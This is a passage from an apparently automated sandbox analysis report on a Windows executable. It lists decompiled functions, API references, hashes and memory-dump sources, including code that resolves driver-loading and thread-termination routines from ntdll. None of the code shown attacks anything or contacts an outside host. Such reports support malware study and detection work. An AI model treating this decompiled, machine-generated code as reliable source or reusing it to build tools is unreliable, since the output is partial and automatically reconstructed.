                                                                                                                                                      • Instruction Fuzzy Hash: 13C012B28282214BE7345A29E80076262D89F14366F22082EE480A31C0DAB89C808658
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00405351, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00405351(WCHAR* _a4) {
				void* _t3;

				_t3 = CreateFileW(_a4, 0x40000000, 1, 0, 2, 0, 0); // executed
				return _t3;
			}




                                                                                                                                                      0x00405363
                                                                                                                                                      0x00405369

                                                                                                                                                      APIs
                                                                                                                                                      • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040972A,?,?,?,00000000,00000002,?,?,00000001), ref: 00405363
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                      • Opcode ID: b680f323cfde0812eaa853d45ec535210a74fce6e52df2a6edf0fc9c67542069
                                                                                                                                                      • Instruction ID: 1e51560ea2d226d7cbdf2b9922d616c5fe3e6071316244dee5f443afb53d0edf
                                                                                                                                                      • Opcode Fuzzy Hash: b680f323cfde0812eaa853d45ec535210a74fce6e52df2a6edf0fc9c67542069
                                                                                                                                                      • Instruction Fuzzy Hash: B1C092B0290200BEFE204A10AD0AF77355EE780700F1084307A00E80E1C2A14C058524
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00405338, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00405338(WCHAR* _a4) {
				void* _t3;

				_t3 = CreateFileW(_a4, 0x80000000, 3, 0, 3, 0, 0); // executed
				return _t3;
			}




                                                                                                                                                      0x0040534a
                                                                                                                                                      0x00405350

                                                                                                                                                      APIs
                                                                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,00403FF7,?,?,00000000,00403B9A,?), ref: 0040534A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                      • Opcode ID: 83eae67f61fdf2e100365e4956c39274e7302c90c3fc809a9cab9d68c9c26962
                                                                                                                                                      • Instruction ID: d588f5942abdbf62074f27fc8161704726317c11aca05e571d26f2c48b98c5da
                                                                                                                                                      • Opcode Fuzzy Hash: 83eae67f61fdf2e100365e4956c39274e7302c90c3fc809a9cab9d68c9c26962
                                                                                                                                                      • Instruction Fuzzy Hash: B3C092B0280200BEFE224A10FD16F36355DE780700F2044347E00F80E0C1604E158524
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040DA82, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040DA82(struct HINSTANCE__* _a4, WCHAR* _a8) {

				EnumResourceNamesW(_a4, _a8, E0040D9FC, 0); // executed
				return 1;
			}



                                                                                                                                                      0x0040da91
                                                                                                                                                      0x0040da9a

                                                                                                                                                      APIs
                                                                                                                                                      • EnumResourceNamesW.KERNELBASE(?,?,0040D9FC,00000000), ref: 0040DA91
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: EnumNamesResource
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3334572018-0
                                                                                                                                                      • Opcode ID: aaa027c10fa78c39d5f0445afb734b26800a59b0cae26a5917b0f34e50669d9c
                                                                                                                                                      • Instruction ID: 51e3a4b42ca36b746c75c5eb4a2aee4057f89303c93404922418ae0f581905ac
                                                                                                                                                      • Opcode Fuzzy Hash: aaa027c10fa78c39d5f0445afb734b26800a59b0cae26a5917b0f34e50669d9c
                                                                                                                                                      • Instruction Fuzzy Hash: F5C09B3356438197C7119F508C09F1B7A95BB54705F504C397151A40E1C7714018A605
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040405E, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040405E(void** __esi) {
				void* _t1;
				signed int* _t2;

				_t2 = __esi;
				_t1 =  *__esi;
				if(_t1 != 0xffffffff) {
					_t1 = FindCloseChangeNotification(_t1); // executed
				}
				 *_t2 =  *_t2 | 0xffffffff;
				return _t1;
			}





                                                                                                                                                      0x0040405e
                                                                                                                                                      0x0040405e
                                                                                                                                                      0x00404063
                                                                                                                                                      0x00404066
                                                                                                                                                      0x00404066
                                                                                                                                                      0x0040406c
                                                                                                                                                      0x0040406f

                                                                                                                                                      APIs
                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000,00403FC6,?,0040BE7E), ref: 00404066
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ChangeCloseFindNotification
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2591292051-0
                                                                                                                                                      • Opcode ID: bc5a44fb32040061edbda8d3543cb511c92e7b0a37bc3428954c49ae59e4d506
                                                                                                                                                      • Instruction ID: 40547022017336ee125913f65e591b655fd6556432e54264b79cbfeb0dc3c2d4
                                                                                                                                                      • Opcode Fuzzy Hash: bc5a44fb32040061edbda8d3543cb511c92e7b0a37bc3428954c49ae59e4d506
                                                                                                                                                      • Instruction Fuzzy Hash: ECB09270500541CBE6345F78884980A7AA4AA813703B44B28A1F6F10F2D33888468A14
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 004057D1, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E004057D1(WCHAR* _a4) {
				long _t4;

				_t4 = GetFileAttributesW(_a4); // executed
				return 0 | _t4 != 0xffffffff;
			}




                                                                                                                                                      0x004057d5
                                                                                                                                                      0x004057e5

                                                                                                                                                      APIs
                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,004071DA,?,00407291,00000000,?,00000000,00000208,?), ref: 004057D5
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                      • Opcode ID: 8e4c376cf7c570f1656cc04afb23f0be4d71cb0539670ea516d7700e7cbaecd3
                                                                                                                                                      • Instruction ID: f1cceac889999bb919f5bca999730fd8e3c757b1acafb66fb331f39110631968
                                                                                                                                                      • Opcode Fuzzy Hash: 8e4c376cf7c570f1656cc04afb23f0be4d71cb0539670ea516d7700e7cbaecd3
                                                                                                                                                      • Instruction Fuzzy Hash: FFB012B52100014BCB1807349D4508D35905F44631B31873CB037D0CF0E730CCA8BA00
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 004048DA, Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 90%
                                                                                                                                                      			E004048DA(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, void** _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t20;
				void* _t22;
				intOrPtr _t25;
				intOrPtr _t29;
				intOrPtr _t31;
				void* _t38;
				void** _t40;
				intOrPtr* _t47;

				_t38 = __edx;
				_t34 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = _a4;
				_t40 = _a12;
				_t31 = 0;
				 *((intOrPtr*)(_a4 + 0x248)) = _t40;
				_v8 = 0;
				if( *((intOrPtr*)(_t40 + 0x428)) <= 0) {
					L3:
					_t20 = 0;
					L4:
					if(_t20 != 0) {
						_t22 = E00404489(_t44 + 0x14, _t34, _t38, _t40, _t20); // executed
						_t53 = _t22;
						if(_t22 != 0) {
							E00406729( *((intOrPtr*)( *((intOrPtr*)(_t40 + 0x418)) + 0xec)), _t44 + 4);
							_t47 = _a4;
							_t25 = E00404689(_a12, _t53,  *((intOrPtr*)(_t47 + 0x220)),  *((intOrPtr*)(_t44 + 4))); // executed
							 *_t47 = _t25;
							 *((intOrPtr*)(_t47 + 0x10)) = 1;
							_v8 = 1;
						}
					}
					return _v8;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t29 = E00403F2B(_t31, _t40 + 0x41c);
					_push(_a8);
					_v12 = _t29;
					L0040E03E();
					_t34 = _t29;
					if(_t29 == 0) {
						break;
					}
					_t31 = _t31 + 1;
					if(_t31 <  *((intOrPtr*)(_t40 + 0x428))) {
						continue;
					}
					goto L3;
				}
				_t20 = _v12;
				goto L4;
			}
















                                                                                                                                                      0x004048da
                                                                                                                                                      0x004048da
                                                                                                                                                      0x004048dd
                                                                                                                                                      0x004048de
                                                                                                                                                      0x004048e1
                                                                                                                                                      0x004048e5
                                                                                                                                                      0x004048e8
                                                                                                                                                      0x004048ea
                                                                                                                                                      0x004048f6
                                                                                                                                                      0x004048f9
                                                                                                                                                      0x00404923
                                                                                                                                                      0x00404923
                                                                                                                                                      0x00404925
                                                                                                                                                      0x00404927
                                                                                                                                                      0x0040492e
                                                                                                                                                      0x00404933
                                                                                                                                                      0x00404935
                                                                                                                                                      0x00404946
                                                                                                                                                      0x0040494d
                                                                                                                                                      0x00404959
                                                                                                                                                      0x0040495e
                                                                                                                                                      0x00404963
                                                                                                                                                      0x00404966
                                                                                                                                                      0x00404966
                                                                                                                                                      0x00404935
                                                                                                                                                      0x00404970
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004048fb
                                                                                                                                                      0x004048fb
                                                                                                                                                      0x00404903
                                                                                                                                                      0x00404908
                                                                                                                                                      0x0040490b
                                                                                                                                                      0x0040490f
                                                                                                                                                      0x00404917
                                                                                                                                                      0x00404918
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040491a
                                                                                                                                                      0x00404921
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404921
                                                                                                                                                      0x00404973
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcsicmp
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2081463915-0
                                                                                                                                                      • Opcode ID: 1a5aa7950c8524b605f159770a309709ad0bf62fba3d30ff973a537a5b72f3ad
                                                                                                                                                      • Instruction ID: fdc747c80fe88fd67bd043bcbe7cc9eb3f50563aa05d6d30472a65970944665d
                                                                                                                                                      • Opcode Fuzzy Hash: 1a5aa7950c8524b605f159770a309709ad0bf62fba3d30ff973a537a5b72f3ad
                                                                                                                                                      • Instruction Fuzzy Hash: 9D115EF5600205AFC710DF79C88099AB7B8FF48354F10453EEA55E3240D734A9508BA8
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00403FDE, Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00403FDE(void** __eax, void* __eflags, WCHAR* _a4) {
				void* __ecx;
				void* __esi;
				intOrPtr _t11;
				void* _t14;
				intOrPtr _t15;
				intOrPtr* _t16;
				intOrPtr* _t22;

				_t22 = __eax;
				 *(__eax + 0x414) =  *(__eax + 0x414) & 0x00000000;
				E0040405E(__eax);
				_t11 = E00405338(_a4);
				 *_t22 = _t11;
				if(_t11 == 0xffffffff) {
					L7:
					 *((intOrPtr*)(_t22 + 0x414)) = GetLastError();
					L8:
					return 0;
				}
				_t14 = E00405E43(_t22 + 4, _t11, _t22 + 4, 0x400); // executed
				if(_t14 == 0) {
					goto L7;
				}
				_t15 =  *((intOrPtr*)(_t22 + 0x418));
				if( *((intOrPtr*)(_t15 + 4)) == 0x89abcdef) {
					_t16 = _t15 + 0xec;
					__eflags =  *_t16;
					if(__eflags == 0) {
						 *_t16 = 0x1000;
					}
					E00404541(__eflags, _t22); // executed
					return 1;
				}
				 *((intOrPtr*)(_t22 + 0x414)) = 0xfff1;
				goto L8;
			}










                                                                                                                                                      0x00403fe0
                                                                                                                                                      0x00403fe2
                                                                                                                                                      0x00403fe9
                                                                                                                                                      0x00403ff2
                                                                                                                                                      0x00403ffb
                                                                                                                                                      0x00403ffd
                                                                                                                                                      0x0040404b
                                                                                                                                                      0x00404051
                                                                                                                                                      0x00404057
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404057
                                                                                                                                                      0x00404009
                                                                                                                                                      0x00404013
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404015
                                                                                                                                                      0x00404022
                                                                                                                                                      0x00404030
                                                                                                                                                      0x00404035
                                                                                                                                                      0x00404038
                                                                                                                                                      0x0040403a
                                                                                                                                                      0x0040403a
                                                                                                                                                      0x00404041
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404048
                                                                                                                                                      0x00404024
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040405E: FindCloseChangeNotification.KERNELBASE(00000000,00403FC6,?,0040BE7E), ref: 00404066
                                                                                                                                                        • Part of subcall function 00405338: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,00403FF7,?,?,00000000,00403B9A,?), ref: 0040534A
                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,00403B9A,?), ref: 0040404B
                                                                                                                                                        • Part of subcall function 00405E43: ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040400E,00000000,?,00000400,?,00000000,00403B9A,?), ref: 00405E5A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$ChangeCloseCreateErrorFindLastNotificationRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4176926985-0
                                                                                                                                                      • Opcode ID: 28e05b3785312bd73728d28a7b4e7de4c452789e56a0673e54d11ff134628f3e
                                                                                                                                                      • Instruction ID: 1be67c3d07cfbe594be31b534527c337e1243451ed86295bd1db7fefa69627cd
                                                                                                                                                      • Opcode Fuzzy Hash: 28e05b3785312bd73728d28a7b4e7de4c452789e56a0673e54d11ff134628f3e
                                                                                                                                                      • Instruction Fuzzy Hash: FD01D1F10016008AD320AB20C805B9376E8DF91315F10893FE3A6F72C1EB7C98818AA9
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00406355, Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00406355(signed int* __esi) {
				void* _t5;
				signed int* _t7;

				_t7 = __esi;
				_t5 =  *__esi;
				if(_t5 != 0) {
					free(_t5); // executed
					 *__esi =  *__esi & 0x00000000;
				}
				_t7[1] = _t7[1] & 0x00000000;
				_t7[2] = _t7[2] & 0x00000000;
				return _t5;
			}





                                                                                                                                                      0x00406355
                                                                                                                                                      0x00406355
                                                                                                                                                      0x00406359
                                                                                                                                                      0x0040635c
                                                                                                                                                      0x00406361
                                                                                                                                                      0x00406364
                                                                                                                                                      0x00406365
                                                                                                                                                      0x00406369
                                                                                                                                                      0x0040636d

                                                                                                                                                      APIs
                                                                                                                                                      • free.MSVCRT(00000000,004065BB,74784E00,?,00000000), ref: 0040635C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: free
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                      • Opcode ID: 087bb4fc264830983fe200f1886ef8bdbde26bdfe1ad20cb23c944558e33102c
                                                                                                                                                      • Instruction ID: 3b7e158b20e84301f479c6044b2c5b8c75456169b8cefd1b15b644340405c36b
                                                                                                                                                      • Opcode Fuzzy Hash: 087bb4fc264830983fe200f1886ef8bdbde26bdfe1ad20cb23c944558e33102c
                                                                                                                                                      • Instruction Fuzzy Hash: 8FC04C72910B019BE7349F26D449766B3E4BF1073BF618C2DA4D5914C1DBBCE494CA18
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00403F55, Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00403F55(void** __esi) {
				void* _t5;
				signed int* _t7;

				_t7 = __esi;
				_t5 =  *__esi;
				if(_t5 != 0) {
					free(_t5); // executed
				}
				 *_t7 =  *_t7 & 0x00000000;
				_t7[3] = _t7[3] & 0x00000000;
				_t7[1] = _t7[1] & 0x00000000;
				return _t5;
			}





                                                                                                                                                      0x00403f55
                                                                                                                                                      0x00403f55
                                                                                                                                                      0x00403f59
                                                                                                                                                      0x00403f5c
                                                                                                                                                      0x00403f61
                                                                                                                                                      0x00403f62
                                                                                                                                                      0x00403f65
                                                                                                                                                      0x00403f69
                                                                                                                                                      0x00403f6d

                                                                                                                                                      APIs
                                                                                                                                                      • free.MSVCRT(00000000,0040BC79,?,00000000,0040C0A1,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0040E23C,00000000), ref: 00403F5C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: free
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                      • Opcode ID: ca8b33ba02bdd68b061cc876ecb80c5c4dc103e44f57bd864d81743fd2e6ef53
                                                                                                                                                      • Instruction ID: 3143f4fb3421a8fd8d8aef00c743a9b8e7153b02c0e56cadf99ac6914a485b7f
                                                                                                                                                      • Opcode Fuzzy Hash: ca8b33ba02bdd68b061cc876ecb80c5c4dc103e44f57bd864d81743fd2e6ef53
                                                                                                                                                      • Instruction Fuzzy Hash: 48C00272910B019FE7309E26C405B66B7E8AF1073BF918C1D94D5914C1D7BCD4448A14
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Function 0040C41D, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 57libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040C41D() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t14;

				if( *0x4132c4 == 0) {
					_t2 = GetModuleHandleW(L"ntdll.dll");
					 *0x4132c4 = _t2;
					 *0x413294 = GetProcAddress(_t2, "NtQuerySystemInformation");
					 *0x413298 = GetProcAddress( *0x4132c4, "NtLoadDriver");
					 *0x41329c = GetProcAddress( *0x4132c4, "NtUnloadDriver");
					 *0x4132a0 = GetProcAddress( *0x4132c4, "NtOpenSymbolicLinkObject");
					 *0x4132a4 = GetProcAddress( *0x4132c4, "NtQuerySymbolicLinkObject");
					 *0x4132a8 = GetProcAddress( *0x4132c4, "NtQueryObject");
					 *0x4132ac = GetProcAddress( *0x4132c4, "NtOpenThread");
					 *0x4132b0 = GetProcAddress( *0x4132c4, "NtClose");
					 *0x4132b4 = GetProcAddress( *0x4132c4, "NtQueryInformationThread");
					 *0x4132b8 = GetProcAddress( *0x4132c4, "NtSuspendThread");
					 *0x4132bc = GetProcAddress( *0x4132c4, "NtResumeThread");
					_t14 = GetProcAddress( *0x4132c4, "NtTerminateThread");
					 *0x4132c0 = _t14;
					return _t14;
				}
				return _t1;
			}






                                                                                                                                                      0x0040c424
                                                                                                                                                      0x0040c430
                                                                                                                                                      0x0040c442
                                                                                                                                                      0x0040c454
                                                                                                                                                      0x0040c466
                                                                                                                                                      0x0040c478
                                                                                                                                                      0x0040c48a
                                                                                                                                                      0x0040c49c
                                                                                                                                                      0x0040c4ae
                                                                                                                                                      0x0040c4c0
                                                                                                                                                      0x0040c4d2
                                                                                                                                                      0x0040c4e4
                                                                                                                                                      0x0040c4f6
                                                                                                                                                      0x0040c508
                                                                                                                                                      0x0040c50d
                                                                                                                                                      0x0040c50f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c514
                                                                                                                                                      0x0040c515

                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,?,0040C596,?,?,00000000), ref: 0040C430
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 0040C447
                                                                                                                                                      • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0040C459
                                                                                                                                                      • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0040C46B
                                                                                                                                                      • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0040C47D
                                                                                                                                                      • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 0040C48F
                                                                                                                                                      • GetProcAddress.KERNEL32(NtQueryObject), ref: 0040C4A1
                                                                                                                                                      • GetProcAddress.KERNEL32(NtOpenThread), ref: 0040C4B3
                                                                                                                                                      • GetProcAddress.KERNEL32(NtClose), ref: 0040C4C5
                                                                                                                                                      • GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 0040C4D7
                                                                                                                                                      • GetProcAddress.KERNEL32(NtSuspendThread), ref: 0040C4E9
                                                                                                                                                      • GetProcAddress.KERNEL32(NtResumeThread), ref: 0040C4FB
                                                                                                                                                      • GetProcAddress.KERNEL32(NtTerminateThread), ref: 0040C50D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                                      • String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
                                                                                                                                                      • API String ID: 667068680-4280973841
                                                                                                                                                      • Opcode ID: 0eddc1e60b10c18c4745ef63ef14c7ef42ad6bc27fe304210325578cd75792ce
                                                                                                                                                      • Instruction ID: 58691313bf47f16c5c12281129ebfbb01f3831da172bf8a538c636a3e5316245
                                                                                                                                                      • Opcode Fuzzy Hash: 0eddc1e60b10c18c4745ef63ef14c7ef42ad6bc27fe304210325578cd75792ce
                                                                                                                                                      • Instruction Fuzzy Hash: 27119778D41325AECB12BF71AD09ACA7EB1E764B5671084F7A408722F0D6B942A0DF4C
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040AE4D, Relevance: 1.5, APIs: 1, Instructions: 21clipboardCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040AE4D(signed int __eax, void* __ecx, void* __edx, void* __esi, void* __eflags) {
				void* __edi;
				int _t11;
				void* _t13;
				void* _t15;
				void* _t17;

				_t15 = __edx;
				_t13 = __ecx;
				_t16 = __esi + 0x6ac;
				E0040637A(__eax | 0xffffffff, __esi + 0x6ac, 0x40f454);
				 *((intOrPtr*)(__esi + 0x6bc)) = 0x4000;
				E0040AE99(_t13, _t15, __esi,  *((intOrPtr*)(__esi + 0x69c)));
				_t17 = E0040636E(_t16);
				_t11 = OpenClipboard( *(__esi + 0x208));
				if(_t11 != 0) {
					return E004054F1(_t17);
				}
				return _t11;
			}








                                                                                                                                                      0x0040ae4d
                                                                                                                                                      0x0040ae4d
                                                                                                                                                      0x0040ae4e
                                                                                                                                                      0x0040ae5c
                                                                                                                                                      0x0040ae67
                                                                                                                                                      0x0040ae72
                                                                                                                                                      0x0040ae84
                                                                                                                                                      0x0040ae86
                                                                                                                                                      0x0040ae8e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040ae96
